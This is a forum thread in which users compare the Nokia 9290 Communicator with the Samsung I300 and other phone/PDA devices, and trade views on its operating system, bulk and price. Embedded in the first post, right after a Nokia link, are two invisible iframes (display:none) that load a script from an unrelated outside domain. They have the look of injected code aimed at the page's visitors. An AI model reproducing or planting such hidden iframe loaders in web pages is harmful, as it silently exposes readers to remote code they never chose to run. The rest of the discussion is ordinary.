+ Reply to Thread

Thread: Nokia 9290

Nokia 9290

FYI. Saw this on the Nokia Sugar Bowl commercials. Pretty slick.
    http://www.nokiausa.com/phones/serie...,4511,,00.html<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Beams from above...
    That was my fault - I had just mailed in my Samsung warranty card...

Seems like Nokia has actually been toying with this for a couple of years now. Wonder why they took so long?

By the way... I'll stick with my I300.

Originally posted by mjorange
    By the way... I'll stick with my I300.
    From what I have read, me too.

I to will keep my I300!!!!

yea, without an operating system like PalmOS or Windows CE, the device will be forever limited....

Brooks

yup, same fate as the TP3000. GREAT phone/pda integration, but could not load on your own apps. The great thing about the 300 and 6035 is the ability for each user to customize it to be the perfect phone/pda combo.
    Carl

Nokia was really on to something when they initially began working on this. They took way too long though. I mean, I remember seeing this phone in movies 2 years ago. With everything else on the market now it looks no better han a Sharp Wizard with a phone.

heh, saw a commercial for it tonight..... my wife says "hey, is that phone better than yours?"...

NOT

Brooks

<-------------------can't stop laughing at that last comment

sweet phone from NOKIA

Since I see so many posts about other phones, I guess it's OK to submit mine.
    The NOKIA 9290 Communicator
    http://www.nokiausa.com/communicator...,4769,,00.html

I don't know if it uses PALM operating systems but the innovation here is splendid. No more using stylus and the fact that it's not as delicate as the I300 really helps. This model is still trying to get approval from the FCC. To bad Sprint doesn't carry NOkia phones but I'm looking forward to seeing what the next gen Palmphones would be like.

personally think this phone is WAACCKKK! I'm sorry you missed an earlier conversation about this, but Nokia has been fooling around with this since '96 friend. Someone took their "Persistance" poster a little bit too seriously! Its different. I'll give you that. A bit refreshing to see a keyboard every now and then. And definately not Palm. Probably runs a similar OS as Psion. And if you think its hard to find accessories for the I300......

I give it some credit

I used the nokia 9000il communicater for almost 2 years. Only until now do they have competition for this phone. 2 years ago, the nokia communicator was the only phone of its kind if you did not want to carry a lap top with you. BUT, at this present time with all of these new phone coming out, the 9290 will have problems.

I do believe that the phone has a EPOC based OS. Gives the phone very limited expandibility if any. I dont know about the new phone, but my 9000il version had NO expandibility at all. Eveything was hard coded and thus it. The phone is very big in size and bulky. You cant clip it to your belt like the i300 or other pda phones coming out. At the time (2 years ago) when i got the phone, it was the top notch technology. But, now.....When i bought my i300 1 week ago, my 9000il has retired. It is time to move on. The world has evolved from the EPOC OS. My opinion, pass the nokia cause it will also come with a hefty price tag. You could probably grab one of the new pda phones coming soon and even have built in bluetooth for less then the nokia 9290.

i dunnu, thus my 2 cents. I give my 9000il props for the 2 years it spent with me and it was dependable. As they say though, all good things must come to an end. Stick with palm/Win. CE devices. EPOC is old school.

I photographed the very first rendition of this back in 1996 (I'm an advertising photographer by day...). It is just updated every so often with new specs, slightly new shell. It didn't ever really catch on here, but in Europe it was huge. We all know the US adopts technology slower than other countries (the Blackberry was created to fill the niche that everyone else in he world has used their phones for since1995 - text messaging).... All of Finland (Nokia homebase) is wired so that you use your phone to even buy from vending machines...

The PDA OS is probably Symbian, which Nokia uses for all their other stuff in Europe. Symbian has so far beaten out every other OS in the handheld game in Europe...
    -[0_0]-

yeah this was state of the art when I first heard about it. then the pentium two was released and I lost interest in it. I too will stick with my samsung.
    Gamefixx.com, A hardcore membership can save you big money

I used that Nokia for 4 months, and I sold it. It is heavy, big,
    and way to fragile. I had so many problems that I had to sent
    it 3 times for repair. Got mad, and I traded it.

I then bought the SPH-I300 and I just love it.

My two cents.

yannco

Administrator

Arrow

Originally posted by yannco
    I used that Nokia for 4 months, and I sold it. It is heavy, big,
    and way to fragile. I had so many problems that I had to sent
    it 3 times for repair. Got mad, and I traded it.

I then bought the SPH-I300 and I just love it.

My two cents.

yannco
    (OT) sounds liike the same thing i did with the Simon cellphone back in the day... got tired of it and digital was just coming out so i traded it in back to bellsouth mobility to get the big face noikia digital phone...